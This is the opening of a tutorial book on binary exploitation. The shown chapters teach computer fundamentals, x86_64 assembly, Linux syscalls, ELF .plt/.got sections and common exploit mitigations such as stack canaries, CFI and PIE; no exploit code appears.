✝️ Matthew 16:24-26
Then Jesus said to his disciples, “Whoever wants to be my disciple must deny themselves and take up their cross and follow me. For whoever wants to save their life will lose it, but whoever loses their life for me will find it. What good will it be for someone to gain the whole world, yet forfeit their soul? Or what can anyone give in exchange for their soul?
# Written by stackpointer
## CHAPTERS
## [foreword](#foreword)
## [chapter negative three - Some Important Concepts](<#chapter negative three - Some Important Concepts>)
## [chapter negative two - Introduction to X86_64 Assembly](<#chapter negative two - Introduction to X86_64 Assembly>)
## [chapter negative one - Introduction to Linux and Some Tools](<#chapter negative one - Introduction to Linux and Some Tools>)
## [chapter zero - Introduction to ELF, glibc, and Some Extra Program Sections](<#chapter zero - Introduction to ELF, glibc, and Some Extra Program Sections>)
## [chapter one - Mitigations](<#chapter one - Mitigations>)
## [chapter two - Integer Issues](<#chapter two - Integer Issues>)
## [chapter three - Out of Bounds Reads and Writes](<#chapter three - Out of Bounds Reads and Writes>)
## [chapter four - Format String Fun](<#chapter four - Format String Fun>)
## [chapter five - Dangling Pointers](<#chapter five - Dangling Pointers>)
## [[#foreword]]
This book teaches binary exploitation from the ground up. It assumes you know nothing about computers and starts from what they are, building all the way up to advanced binary exploitation techniques.
## [[#chapter negative three - Some Important Concepts]]
So, before we exploit our target, we must know our target. I will introduce you to some terms.
So let's start at the very basics… What is a computer? A computer is something that has a state and has rules that change the state. State simply means "what the computer contains"; it could contain numbers, letters, colors, etc. The rules are simply "what the computer can do". So, by that logic, the following idea could be a computer: a box that stores a number, with two rules. Rule one: we can change the number in the box by 1, in either the positive or the negative direction. Rule two: once we try to bring the number below 0, the number gets set to 99, and once we try to go above 99, the number gets set to 0.
Another example of a computer could be two boxes that each store a number, with the rules being "we can add the number in box 2 to the number in box 1 and store the result in box 1" and "if the sum of the two numbers is bigger than 99, the number in box 1 gets set to 0 and the number in box 2 gets set to a random number less than 99 but greater than 0".
One final example of a computer could be a box that only stores a single letter, with the rule being "if the letter is lowercase it gets changed into uppercase, or if the letter is uppercase it gets changed into lowercase". Say the box holds the lowercase letter m; if the rule were applied, the box would now contain the uppercase M. We can apply the rule again, turning uppercase M into lowercase m. Note that this is just one rule, but it may feel like two rules because the letter can be in two different states and the rule reacts differently depending on the state. We could split it into two rules, "if the letter is lowercase it gets changed into uppercase" and "if the letter is uppercase it gets changed into lowercase", but splitting it into two rules does not change how the computer behaves. It does not matter if there is one rule with two different possible outcomes or two rules with one possible outcome each; the computer's state still changes the exact same way.
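The letter box can be sketched the same way (again, Python only as a scratchpad, not part of this book): one rule whose outcome depends on the state.

```python
# The one-rule letter box: a single character as state.
letter = 'm'

def apply_rule(c):
    # One rule, two outcomes depending on the current state:
    # lowercase becomes uppercase, uppercase becomes lowercase.
    return c.upper() if c.islower() else c.lower()

letter = apply_rule(letter)  # 'm' -> 'M'
letter = apply_rule(letter)  # 'M' -> 'm'
print(letter)
```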
There are many different ways to implement a computer in the real world. But in this book, when I refer to real world computers and their parts, I am talking about the x86_64 architecture. An architecture describes what rules the computer understands and how those rules change the state.
In the real world, computers must follow the same idea of rules and state. However, there are more rules and more states. In the real world, computers have a component to run the rules that affect the state, which is called the CPU. The CPU simply runs instructions (also called code) that change the state of the CPU or of other components, such as RAM.
RAM, which stands for random access memory, can be thought of as a bunch of identical boxes next to each other. Each box can store a number, and the boxes are numbered starting at 0 instead of 1. For example, if you want the very first box, you would want box 0; the box after that is box 1, and so on. The computer also has other components, such as ROM, which means read-only memory. ROM can be thought of like RAM, but the values inside the boxes don't change. The CPU can load something from ROM into its own state or into RAM. There is the motherboard, which connects all the pieces of the computer together. There is the disk, which is permanent storage that stays the same even if the computer is turned off, unlike RAM. The keyboard is how we give the computer information one key press at a time, and the computer reacts to each press based on whatever rules it follows. The screen is how we see the information the computer sends back to us. The screen displays colors, shapes, letters, numbers, etc., based on what the rules tell it to show.
Note that when I refer to memory in the rest of this book, I am referring to RAM.
The CPU has its own state in the form of registers, which can be thought of as small boxes that store numbers. Say the CPU wants to load something from RAM into one of its registers: the CPU would access a certain box in RAM by number and make the register's value equal to that box's value ("grab the value at box 777 and load it into this register"). The term address means the location of a box in RAM. For example, I could say "address 1337 holds the value 7", which means box 1337 in RAM holds the value 7. A pointer is a register or a RAM location that holds an address. For example, I could say "this register points to address 1337", which simply means that the register's contents are equal to 1337, which is the address of a box. It is important to note that addresses and numbers are the same thing; an address just happens to be where a box is in RAM. The CPU can also copy a register's contents to RAM. For example, say a certain register holds the value 7 and we want to write to address 1337: the CPU would simply copy the data in the register, which is 7, to address 1337. So address 1337 would hold the value 7.
The CPU has two very important registers: the instruction pointer, which holds the address of the next rule to be run, and the stack pointer, which holds the address of the lowest element on the stack. The stack can be thought of as a stack of papers that starts on the ceiling and grows downward toward the floor. New papers get added right beneath the current bottom page, and papers get removed by taking that bottom page off.
It is important to note that the boxes (both the ones RAM holds and what registers are) are made of bytes. RAM is simply bytes next to each other, while registers are the same except that they are part of the CPU's state. Each byte stores 8 bits, and a bit can either be a 0 or a 1. We can represent numbers with bits. For example, the number one in bits would be 1, two would be 10, three would be 11, four would be 100, five would be 101, and so on. The contents of a single byte equal to seven would look like this: 00000111. Bit notation is hard to read, so instead of looking at the value of a byte like 00000111, we can look at it like this: 0x7. The 0x before the number means hex notation. Hex notation is like our base 10 counting system, but after 9, instead of 10, we have 0xa, 0xb, 0xc, 0xd, 0xe, 0xf, and then we have 0x10. Hex is simply a base 16 counting system with a-f after 9. A byte can store a max value of 11111111 in bit notation, which is 0xff in hex notation and 255 in our normal human base 10 counting notation. Two bytes next to each other can store bigger numbers than 255: two bytes can store up to 1111111111111111 in bit notation, which is 0xffff in hex notation and 65535 in our notation. The more bytes, the bigger the number. The CPU can access multiple bytes at once, so instead of accessing just 10101111 we can access 1000000010101111. The CPU can grab the contents at address 0xffff (1111111111111111 in bit notation) and load them into a register (remember, an address can be thought of as the location of a byte in RAM).
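You can check these notation claims for yourself. Python (used here only as a calculator, not as part of this book) has built-in converters between the three notations:

```python
# The same numbers in bit, hex, and base 10 notation.
print(bin(7))    # 0b111 (the 0b prefix means bit notation)
print(hex(7))    # 0x7   (the 0x prefix means hex notation)
print(0xff)      # 255, the biggest value one byte can hold
print(0xffff)    # 65535, the biggest value two bytes can hold
print(0b00000111 == 0x7 == 7)  # True: all three are the same number
```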
With real world computers, we access things by numbers, as you saw with addresses, but everything inside the real world computer is also a number (yes, EVERYTHING!). Since everything on the x86_64 architecture is a number, that includes characters. Characters are simply letters such as 's', 't', 'a', 'c', 'k', etc., digits like 1, 2, 3, etc., and symbols like #, $, {, ), ], etc. Note that there is a difference between something like the character 7 and the actual number 7. The character 7 in hex would be 0x37, while the number 7 would be 0x07. A string is simply a collection of characters that usually ends in 0.
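A quick way to see the character/number difference (again using Python purely as a scratchpad):

```python
# The character '7' and the number 7 are different values.
print(hex(ord('7')))  # 0x37: the number behind the character '7'
print(hex(7))         # 0x7: the actual number 7

# A string is characters back to back, usually ended by a 0:
s = b"stack\x00"
print(list(s))  # [115, 116, 97, 99, 107, 0] -- every character is just a number
```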
A program is made up of named sections, which are groups of bytes that serve specific purposes. The .text section is where the rules that modify state, called instructions (also called code), are stored. The .data section holds bytes that start off as specific values. The .bss section holds bytes that start off as 0. A program sits on disk simply as bytes, and can be copied into RAM so that the CPU can run those instructions and use the data. The program sections will usually be next to each other; however, this isn't a guarantee. For example, there could be a gap between .text and .data. Note that the names of the sections don't really matter and can be anything: .text could be called CODE, .data could be called GLOBALZ, etc.
A process is a program that's been loaded into RAM, where its instructions (the bytes inside .text) can be run by the CPU, and the process contains additional sections like the stack. A process also has its own state, which consists of its own CPU state plus all the bytes inside all of its sections. Note that processes keep the same distance between the original program sections: for example, if .data is 0x1000 bytes after the end of the .text section in the program, they will stay the same distance apart in the process. The CPU does not run the entire process's .text section at once. The process runs for a short amount of time, then its state gets saved, and another process's state gets loaded into the CPU. This is called a context switch: the act of saving one process's state and restoring another's. The kernel controls all of this. It decides which process gets CPU time, which process runs next, when to context switch, etc. A process can exit itself, meaning that it stops running and gets unloaded from RAM. When a process exits, it gives the kernel something called an exit code, which is a number that is usually used to indicate how the process ended. An exit code of 0 usually means "Everything is fine! I exited because I am done", while any other number usually means something else happened.
A thread is a way to separate the work of a process. Threads can be thought of as having their own CPU state and their own separate stack. A running process has 1 thread by default (that CPU state + stack), which is called the main thread, but it's possible to have multiple threads, each with their own state. So if a process has 2 threads, it would have 2 separate CPU states + 2 separate stacks. Threads can share memory with each other via sections like .data or .bss.
If two processes write and read to the same address, things can get messy. Luckily, kernels implement something called virtual memory, where both processes have the illusion of reading/writing to a certain address, but in reality those processes access two different parts of RAM.
Virtual memory can be implemented in many different ways; one of the most popular is something called paging. Each process has its own virtual address space, which is a range of addresses (with gaps) where the process's contents will live. For example, the virtual address space of a process might look like:
```
[0x0000-0x1000]
[0x1000-0x2000]
[0x7000-0x8000]
```
Note that every process has a base address, which is just where the program gets loaded in virtual memory.
The virtual address space is how the process views its own memory. However, these addresses are not where the process exists in RAM. A virtual address space is just where the process thinks it is in RAM; in reality, the kernel translates each virtual address to a real location in RAM. Say the process writes 7 to virtual address 0x1337: the CPU won't actually write to that address in RAM. Instead, it consults a page table, which is basically a table (set up by the kernel) that tells the CPU what physical address each virtual address should go to. When someone says "physical address" they mean the actual location in RAM; when they say "virtual address" they mean the address the process sees and uses inside its own virtual address space. Note that a process cannot read/write to any physical address; it can only read/write to an address inside of its virtual address space.
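The translation idea can be modeled with a toy page table. This is a Python sketch with a made-up mapping, not how any real kernel stores its tables; it only shows the split of an address into a page and an offset, and the lookup.

```python
# A toy page table: virtual page number -> physical page number.
PAGE_SIZE = 0x1000

page_table = {0x0: 0x5, 0x1: 0x9, 0x7: 0x2}  # hypothetical mapping

def translate(virtual_address):
    page = virtual_address // PAGE_SIZE    # which virtual page the address is in
    offset = virtual_address % PAGE_SIZE   # where inside that page it is
    if page not in page_table:
        raise Exception("not inside the virtual address space!")
    return page_table[page] * PAGE_SIZE + offset

# Virtual 0x1337 is in page 0x1, which this table maps to physical page 0x9:
print(hex(translate(0x1337)))  # 0x9337
```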
The act of a process requesting a privileged operation, such as adding a new section to itself, writing data to disk, etc., is called a system call, which can be shortened to syscall. To perform a syscall, certain registers must contain certain values. For example, say we want a new section for our process starting at virtual address 0x777 with a size of 0x1000: one register would be set to the location, another to the size, and another to the syscall number, and then the syscall would be performed via a special instruction. When a syscall is performed, the CPU saves the process's state and jumps into the kernel, which runs instructions based on that syscall number. After the syscall is finished, the process's state is restored, with the result of the syscall (like the virtual address of the new section) being loaded into the same register where we had the syscall number. There are certain instructions that only the kernel can run and a normal process cannot.
A file system is how the disk is organized. At the top, there is a directory, which can be thought of as a folder that stores files and other directories. A file is simply a region of disk with certain bytes and a name. Programs are files because they are on disk with a name and contents.
Say we have an instruction that grabs 4 bytes starting at address 0x7331 and loads them into a register. The order those bytes are stored in is called endianness. The x86_64 architecture stores data in a format called little endian, meaning that the number is stored backwards. The value 0x71337 stored in 4 bytes would look like this: ``[0x37][0x13][0x07][0x00]``. Big endian is the opposite of little endian, meaning the number is stored like we would expect, like this: ``[0x00][0x07][0x13][0x37]``. Note that endianness only applies to multi-byte values; if we were to store something like 0x7 at address 0x0 as one byte, it would look like this: ``[0x07]``.
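You can see both byte orders directly with Python's struct module (Python again used only as a scratchpad here):

```python
import struct

# Pack the value 0x71337 into 4 bytes, both ways.
little = struct.pack("<I", 0x71337)  # "<I" = little endian, 4 bytes
big = struct.pack(">I", 0x71337)     # ">I" = big endian, 4 bytes
print(little.hex())  # 37130700 -> [0x37][0x13][0x07][0x00]
print(big.hex())     # 00071337 -> [0x00][0x07][0x13][0x37]
```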
## [[#chapter negative two - Introduction to X86_64 Assembly]]
As you know, all computers have rules, and assembly is those rules written in a human-readable format. That means every assembly instruction is a direct rule the CPU will follow. If you can read assembly, you can understand how everything inside the computer works, such as programs, the kernel, and even the computer itself. Each instruction changes the computer's state; for example, say we move some data from a register into RAM or vice versa, that would be a state change. An instruction is made up of a mnemonic and arguments: the mnemonic is the name of the instruction, and the arguments are what the instruction takes as input to do its task. One thing to note before I teach you x86_64 assembly is that the x86_64 architecture has a LOT of rules, some with weird side effects. The registers that the x86_64 architecture has are: rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, r8, r9, r10, r11, r12, r13, r14, r15, rip, and rflags. Each of these registers can be split up into smaller chunks. For example, rax is a 64 bit (8 byte) register, meaning that its size is equal to 64 bits (or 8 bytes!). The bottom 4 bytes of rax are called eax, the bottom 2 bytes of eax are called ax, the upper byte of ax is called ah, and the lower byte of ax is called al. The same concept applies for rbx, rcx, and rdx. The registers rsi, rdi, rbp, rsp, r8, r9, r10, r11, r12, r13, r14, and r15 don't have an upper byte equivalent (such as ah, bh, ch, dh). However, they do have names for their lower 8 bits: sil, dil, bpl, spl, r8b, r9b, r10b, r11b, r12b, r13b, r14b, r15b. When you write to a 32 bit register such as eax, the upper 4 bytes of the full register get set to zero, unlike when you write to a 16 bit register such as ax, where the upper 48 bits do not get set to zero.
A label is a named location in memory that we can set the instruction pointer to or read/write to if said label is in the correct section. There are some special labels such as ``_start`` which is just the start of the .text section. To declare ``_start`` in assembly, we would do this:
```
global _start
_start:
[ASSEMBLY INSTRUCTIONS HERE]
```
Before declaring \_start, ``global _start`` must be declared, which makes the label visible to the linker.
To define a label we just type the label's name, which can be anything we want, followed by a colon, for example:
```
hello:
[ASSEMBLY INSTRUCTIONS HERE]
```
When working with memory in assembly, it is important to note that there are multiple ways to access/modify memory, and you have to be explicit about how much data you want to access/modify. The different sizes are: byte, which is simply 8 bits; word, which is 2 bytes (16 bits); dword, which is 4 bytes (32 bits); and qword, which is 8 bytes (64 bits). When used, these keywords tell the CPU how much memory to access/modify. To write a single byte somewhere in memory we would do this:
```
mov byte [rax], 1
```
When the size is not specified, it is automatically inferred from the register:
```
mov al, [rbx]
mov ax, [rbx]
mov eax, [rbx]
mov rax, [rbx]
```
The above instructions simply treat the value of rbx like an address in memory. The CPU grabs whatever data is at that address and copies it into the register.
Memory can be accessed in more complex ways. For example, we can tell the CPU to get a value from memory using a register that holds an address, or we can mix registers and numbers. The general way to access memory looks like this: ``[base + index * scale + offset]``. Base is a register holding an address that points somewhere in memory. Index must be a register and is used like a counter. Scale is how much to multiply the index by (it can be 1, 2, 4, or 8). Offset is a constant positive or negative number added to the address. You can leave out any part you don't need, but you need at least one part.
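The address the CPU ends up using is just the arithmetic spelled out in the brackets. A Python sketch of the computation (scratchpad only; register names in the comment are just an example):

```python
# The effective address computation [base + index * scale + offset], by hand.
def effective_address(base, index=0, scale=1, offset=0):
    assert scale in (1, 2, 4, 8)  # the only scales the CPU allows
    return base + index * scale + offset

# e.g. [rbx + rcx * 4 - 8] with rbx = 0x1000 and rcx = 3:
print(hex(effective_address(0x1000, index=3, scale=4, offset=-8)))  # 0x1004
```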
The mov instruction simply copies data from one place to another. For example, ``mov rax, rbx`` copies the data from rbx into rax, making rax have the same value as rbx. ``mov rax, [rbx]`` means: treat rbx as a pointer, grab whatever is at that address, and copy it into rax. So, say address 0x1337 in RAM holds the value 7 and rbx is equal to 0x1337; the above operation would result in rax's value being equal to 7. The register rax can also be treated as a pointer, so ``mov [rax], rbx`` writes rbx to the address that rax holds.
For every instruction, the two sides can be a register and a register, a register and a number, an address and a register, or an address and a number. If an instruction stores data into one of its arguments, it stores data into the first argument, and that first argument must be a register or an address. The second argument can be anything besides an address if the first argument is an address. So, for example, we can do stuff like:
```
mov rax, 0x1337
mov byte [rax], 0x77
mov rbx, 0x7331
mov qword [rbx], rax
```
We cannot have an instruction that stores data into a number. For example, we can't have this:
```
mov 7, al
```
The add instruction adds the two arguments together and stores the result in the first argument, for example ``add rax, rbx``. Like mov, add can be used with memory addresses. The sub instruction is like the add instruction, but instead of adding, it subtracts. We will cover the multiplication and division instructions later. An important thing to note is that the x86_64 architecture does not support any instruction where all the arguments are addresses; at least one argument must be a register or a plain number.
We also have the inc instruction, which increases its argument by 1, and its opposite, the dec instruction, which decreases its argument by 1.
A bitwise operation is an operation that performs a logical operation on the bits of its arguments. The logical operation could be and, or, not, xor, or test. The and instruction takes two arguments and checks each pair of bits in them: if both bits are 1, the resulting bit will be 1; if the bits aren't both 1, the resulting bit will be 0. It stores the final result in the first argument, for example:
```
mov eax, 12
and eax, 5
```
The result will be 4 because the bits of 12 and 5 look like this:
```
1100
0101
```
The or instruction is like and, but the resulting bit is 1 if either bit is 1. The not instruction takes 1 argument and flips its bits. The xor instruction is like or, but if both bits are 1, the result is 0. The test instruction performs a bitwise and on its 2 arguments but does not store the result in either argument; however, it does set the rflags register. Note that for these bitwise operations, the first argument must be a register or an address, and the next argument can be anything. Remember, both arguments cannot be addresses.
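These operations map directly onto Python's bitwise operators, so you can check them on any numbers (Python as a scratchpad again; the masking with 0xff is just to keep not within one byte):

```python
print(12 & 5)      # and: 1100 & 0101 = 0100 = 4
print(12 | 5)      # or:  1100 | 0101 = 1101 = 13
print(12 ^ 5)      # xor: 1100 ^ 0101 = 1001 = 9
print(~12 & 0xff)  # not, kept to one byte: ~00001100 = 11110011 = 243

# test is just an and whose result is thrown away, keeping only the flags:
zero_flag = (12 & 5) == 0
print(zero_flag)   # False: the and result was 4, not 0
```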
The rflags register keeps track of the results of previous operations. Each bit in the rflags register is tied to a kind of result. For example, if the result of an operation was 0, such as:
```
xor eax, eax
```
The zero flag (ZF) would be set. If the result was a negative signed number (we will cover signed numbers later), the sign flag (SF) would be set. The carry flag (CF) would be set if there was an unsigned under/overflow (we will cover those later). The overflow flag (OF) would be set if there was a signed under/overflow. The parity flag (PF) would be set if the lower byte of a result has an even number of 1s.
The rsp register is the stack pointer on x86_64. Speaking of the stack, to push 8 bytes onto the stack, you would do this:
```
push 7
```
Which would push the number 7 as 8 bytes onto the stack: ``[07][00][00][00][00][00][00][00]``. Note that the thing you're pushing onto the stack must be a number, an address, or a register; if it is an address or a register, its size must be 64 bits, and if it is a number, it is inferred to be 64 bits.
To remove 8 bytes from the stack and pop the data that was on top of the stack into a register or into memory, you would do this:
```
pop rax
```
or
```
pop qword [rax]
```
Note that when popping data off the stack into memory, you need an explicit size, and it must be a qword. You can also make space on the stack with the sub instruction:
```
sub rsp, 5
mov byte [rsp], 'h'
mov byte [rsp + 1], 'e'
mov byte [rsp + 2], 'l'
mov byte [rsp + 3], 'l'
mov byte [rsp + 4], 'o'
add rsp, 5
```
As you can see, the add instruction is being used to restore the stack pointer to its original value. You can also see that we can refer to actual characters by surrounding them with the ``'`` character.
As you know, the instructions will be in the .text section of the program, but you can also put data in the .data, .bss, .text, and other sections. Data that can be accessed anywhere in the program by name is called a global. For example, to define a byte with a name that can be accessed from anywhere within the program, we would do this:
```
mov eax, [rel hi]
hi db 0
```
In this context, hi is a global. We are moving the value of hi, which is 0, into eax; hi may be a global, but in reality that global corresponds to a memory address. We can define globals with different sizes. For example, a 5 byte global would look like this:
```
hi db 0, 7, 3, 3, 1
```
Since globals are just memory addresses, you can define data at said address.
You can also define globals like this:
```
hi times 100 db 0
```
Which would create a 100 byte global with all the bytes set to 0. There are different ways to define the size of a global: there is db, which means define byte; dw, which means define word; dd, which means define double word; and dq, which means define quad word. The rel keyword accesses the global relative to the instruction pointer instead of through its raw address. Using rel is better than accessing the raw memory address for many reasons, such as ASLR, which I will cover later. For the love of God, please use rel with globals! To load the address of a global into a register, we would simply do this:
```
lea rax, [rel SOME_GLOBAL]
```
The lea instruction computes the address expression inside the ``[]`` and copies the resulting address into a register, without treating it as an address to load data from.
To check how two values compare, you can use the cmp instruction, followed by a jump to a label that is taken if the condition is true. For example:
```
cmp byte [rax + 7], 0x73
je jump_to_this_label_if_true
```
The first argument of the cmp instruction must be a register or an address; the next argument can be anything, but remember, both arguments cannot be addresses.
The above instructions check if the data at the address rax plus 7 is equal to 0x73, and if it is equal, the instruction pointer is set to the label jump_to_this_label_if_true. There are a lot of different jump conditions, such as: the two values equal each other (je or jz), are not equal (jne or jnz), less than (jl for signed, jb for unsigned), greater than (jg for signed, ja for unsigned), less than or equal to (jle for signed, jbe for unsigned), greater than or equal to (jge for signed, jae for unsigned), plus jumps based on whether a single flag is set or not. (We will cover signed versus unsigned comparisons later.) To jump somewhere no matter what, the jmp instruction is used, for example:
```
loop_forever:
jmp loop_forever
```
We can define globals in different sections of the program, for example:
```
section .data
data_global dd 1, 2, 4, 8
section .bss
bss_global resb 10
```
The resb "instruction" just reserves a certain number of bytes to use and doesn't set them to anything. The resb/resw/resd/resq, db/dw/dd/dq, and times "instructions" aren't actual instructions that the CPU understands; they are directives understood by the assembler to reserve or define space (I will explain what an assembler is later).
A function is just a bunch of instructions that ends in a ret instruction or an exit syscall (which we will cover later). Say we have the following instructions:
```
global _start
section .text
add_three_numbers:
add rdi, rsi
add rdi, rdx
mov rax, rdi
ret
_start:
xor edi, edi
xor esi, esi
xor edx, edx
mov dil, [rel GLOBAL_BYTE]
mov sil, [rel ANOTHER_GLOBAL_BYTE]
mov dx, [rel GLOBAL_WORD]
call add_three_numbers
add rbx, rax
[MORE ASSEMBLY INSTRUCTIONS HERE]
section .data
GLOBAL_BYTE db 17
ANOTHER_GLOBAL_BYTE db 38
GLOBAL_WORD dw 7
```
First of all, rdi, rsi, and rdx are all set to 0. Next, the contents of GLOBAL_BYTE are loaded into dil, the contents of ANOTHER_GLOBAL_BYTE into sil, and the contents of GLOBAL_WORD into dx. Then we have the call instruction, which pushes the instruction pointer onto the stack (in this case, the virtual address where ``add rbx, rax`` is) and sets the instruction pointer to the address that we wanted to call (in this case, add_three_numbers). The contents of rsi and rdx are added to the contents of rdi, and rax is made equal to rdi. Then we have the ret instruction, which pops the value on the top of the stack into the instruction pointer (in this case, the virtual address where ``add rbx, rax`` is).
Since registers can hold addresses you can jump or call a register like this:
```
global _start
section .text
add_two_numbers:
mov rax, rdi
add rax, rsi
ret
_start:
add rsp, 8
mov edi, 7
mov esi, 8
mov rax, add_two_numbers
call rax
mov rax, _start
push rax
jmp [rsp]
```
You can also do the following:
```
global _start
section .text
add_two_numbers:
mov rax, rdi
add rax, rsi
ret
_start:
mov edi, 7
mov esi, 8
mov qword [rel some_global], add_two_numbers
call [rel some_global]
mov qword [rel some_global], _start
jmp [rel some_global]
section .data
some_global dq 0
```
The above examples are of an indirect call and an indirect jump, which is when a call or jump happens through a register or a pointer. The ``ret`` instruction performs an indirect jump, since it pops whatever is on the top of the stack and jumps to it.
Say we have the following instructions:
```
global _start
section .text
_start:
mov eax, [rel BYTE00]
section .data
BYTE00 db 1
BYTE01 db 3
BYTE02 db 3
BYTE03 db 7
```
Since the size is inferred to be 4 bytes, because eax is 4 bytes wide, after the mov instruction eax would contain not just the contents of BYTE00 but the contents of BYTE00 through BYTE03. If we wanted to make eax ONLY equal to BYTE00, we could set eax to 0 and load BYTE00 into al. Or we could do this:
```
movzx eax, byte [rel BYTE00]
```
or
```
movsx eax, byte [rel BYTE00]
```
Which would only copy the contents of BYTE00 over. We will cover movsx and movzx in more detail later. Note that we cannot do something like this:
```
mov eax, byte [rel BYTE00]
```
We can set the lower byte of a register or a byte of memory to 0 or 1 based on a condition, using the set family of instructions. For example, setae sets its argument to 1 if the previous comparison came out above or equal (unsigned), and to 0 otherwise:
```
cmp al, 7
setae byte [rel SOME_BYTE]
```
In the next chapter, I will show you how to take your assembly instructions and actually build a real Linux program from it.
## [[#chapter negative one - Introduction to Linux and Some Tools]]
An assembly file is simply a file that contains assembly instructions, plus directives describing how said file should be organized, for example:
```
global _start
_start:
mov edi, 7
mov eax, 60
syscall
```
Note that the syscall instruction does exactly what I explained in chapter -3: it performs a system call, with rax being used to specify which syscall to perform. Since rax is holding 60, in this case the exit syscall will be performed (rdi holds its argument, the exit code, which here is 7). The exit syscall simply stops the CPU from running the process and unloads the process from RAM.
The syscall number you want should be stored in rax, and the arguments of the syscall are stored in this order: rdi, rsi, rdx, r10, r8, r9.
Linux has many syscalls, such as read, write, open, ptrace, etc., some of which we won't cover in this book.
An assembler is a program that turns an assembly file into an object file. An object file can be thought of as a half-finished program: it contains the actual state-modifying rules and the names of the labels and functions, but not where any of them will be in memory. The linker turns an object file into a real program by deciding where everything should go.
Linux is a kernel that has a bunch of tools written for it.
(TODO!)
(LAB SETUP HERE AND INTRODUCTION TO WHAT A TERMINAL IS, WHAT GDB IS, ETC)
(TODO!)
To assemble and link your first object file to create a program, type the following command in your terminal: ``cd ~/labs/first_steps; nasm -f elf64 first_steps.asm -o first_steps.o; ld first_steps.o -o first_steps``.
Linux gives you syscalls to do privileged operations, but sometimes using those syscalls is annoying, and that is why glibc was invented.
Glibc is a collection of functions that any program can access when they need to do things such as read a file, manage memory, write an unspecified amount of characters to a file, etc.
Alignment means certain things in memory have to start at an address that is divisible by a certain number; for example, some glibc functions require the stack pointer to be aligned to 16 bytes.
An example of a program that uses glibc is as follows:
```
extern puts
global main
section .text
main:
lea rdi, [rel example]
call puts
ret
section .data
example db "This is an example!", 0
```
Code that uses glibc must define main instead of \_start. To assemble and link this we would do this:
``cd ~/labs/glibc_example; nasm -f elf64 example.asm -o example.o; gcc -no-pie example.o -o example``.
Note that strings are enclosed by the `"` character. The above code simply writes each byte of example (besides the last one) to a special file called stdout. Stdout is special because we can see its contents directly on the computer screen; stdin is where our keyboard input arrives. The extern line says "hey assembler! We want to use this glibc function."
When a program calls a function or jumps to a label, it doesn't jump to the name, it jumps to the location; however, the names of those functions and labels are still stored inside the program. To remove those names you can use a tool called strip, which simply removes the names: ``strip example``.
One final thing to note is how glibc functions expect their arguments to be passed. Glibc expects arguments in this order: rdi, rsi, rdx, rcx, r8, r9, and then on the stack.
An example of the write syscall is as follows:
```
sub rsp, 4
mov byte [rsp], 'n'
mov byte [rsp + 1], 'i'
mov byte [rsp + 2], 'c'
mov byte [rsp + 3], 'e'
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, 1
syscall
add rsp, 4
```
We simply write "nice" to stdout. In the above code, we make space on the stack to store the string "nice", we then set rdi to 1 which means "write to stdout", we set rsi to rsp, which holds the address of the string "nice", we set rdx to 4 which is the number of bytes we want to write, we set rax to 1 which is the syscall number for write and we run the syscall instruction. Finally, we restore the stack pointer to its original value.
An example of the read syscall is as follows:
```
sub rsp, 4
xor edi, edi
mov rsi, rsp
mov edx, 4
xor eax, eax
syscall
add rsp, 4
```
We simply read a maximum of 4 bytes from stdin. In the above code, we make space on the stack, we set rdi to 0 which means "read from stdin", we make rsi equal rsp, which will hold the data we entered, we set rdx to 4, which means a maximum of 4 bytes to read, we set rax to 0 which is the syscall number for read and we run the syscall instruction. We then restore the stack pointer to its original value.
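For readers who want to poke at these two syscalls without writing assembly, here is a small sketch in Python, whose os.read and os.write functions are thin wrappers over the same read and write syscalls. The pipe is only there so the example is self-contained; file descriptors 0 (stdin) and 1 (stdout) behave the same way.

```python
import os

# Create a pipe: read_fd and write_fd are plain file descriptors,
# just like the 0 and 1 we passed in rdi above.
read_fd, write_fd = os.pipe()

os.write(write_fd, b"nice")   # write syscall: fd, buffer, count
data = os.read(read_fd, 4)    # read syscall: fd, buffer, max count
print(data)                   # b'nice'
```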
## [[#chapter zero - Introduction to ELF, glibc, and Some Extra Program Sections]]
As you know, a program is made up of different sections, and a program gains some additional sections when it uses glibc functions: the .plt and .got sections.
The .plt section is used when the program wants to call a glibc function. Each glibc function has its own small set of instructions inside the .plt. The first time a glibc function is called, the .plt instructions jump to other instructions in the program that result in the virtual address of that glibc function being written into a spot in the .got section, which is used to hold the virtual addresses of glibc functions. After that setup is finished, future calls to the same glibc function skip the setup and jump to the address stored inside the .got section.
It is important to note that the sections of a program have different permissions, meaning different rules apply to them. A section can have the read permission, which means bytes from that section can be loaded into a register or another part of the program; the write permission, which means data can be stored into that section; and finally the execute permission, which means the section's bytes can be treated as instructions and run.
One final thing to note is that every process has a unique number, called the process id (PID) that the kernel gives it so it knows which process is which.
An example of a program using a syscall to print a message to the screen and another syscall to exit with a code of 7:
```
global _start
section .text
_start:
mov edx, 14
lea rsi, [rel hello]
mov edi, 1
mov eax, 1
syscall
mov edi, 7
mov eax, 60
syscall
section .data
hello db "Hello reader!", 10, 0
```
To assemble and link the assembly code into a program you would do this: ``nasm -f elf64 example.asm -o example.o; ld example.o -o example``. To do the same thing but with glibc instead of syscalls:
```
extern puts
extern exit
global main
section .text
main:
lea rdi, [rel hello]
call puts
mov edi, 7
call exit
section .data
hello db "Hello reader!", 0
```
To assemble and link the assembly code into a program you would do this: ``nasm -f elf64 example.asm -o example.o; gcc -no-pie example.o -o example``.
## [[#chapter one - Mitigations]]
A vulnerability is when a program lets you do something the original programmer never intended. For example, say we have a video game where if you die, you drop your items; however, say you die and your items don't drop. That would be a vulnerability because it was never intended to happen.
Before covering different types of vulnerabilities I am going to cover mitigations which make them either harder or impossible.
Starting off strong we have the stack canary, which is a group of bytes that sits before the return address. These bytes are checked before a function returns, and if they have changed, the process exits.
The shadow stack is a second stack that stores only return addresses. During a function return, the top element of the shadow stack is compared against the return address on the normal stack; if they do not match, the process exits. A shadow stack can be implemented in software or hardware.
Control flow integrity (CFI) is a family of techniques that only allow compiler-approved indirect calls/jumps. One example of CFI, called indirect branch tracking (IBT), places an endbr64 instruction at the beginning of every valid indirect call/jump target; if an indirect call/jump doesn't land on an endbr64 instruction, the process exits. CFI can also stop the process from returning to a non-approved location via a hardware shadow stack. Intel CET can be thought of as IBT plus a hardware shadow stack.
\_FORTIFY_SOURCE adds compile-time and runtime checks to unsafe libc function calls.
RELRO makes the program's GOT read-only after relocations are resolved.
Position independent executable (PIE) tells the kernel, when loading a program into memory, to not put it at the same virtual address every time it becomes a process. PIE only changes where the program gets mapped into virtual memory, not the distances between its sections. If a program does not have PIE enabled, an attacker would know where the process is in virtual memory all the time.
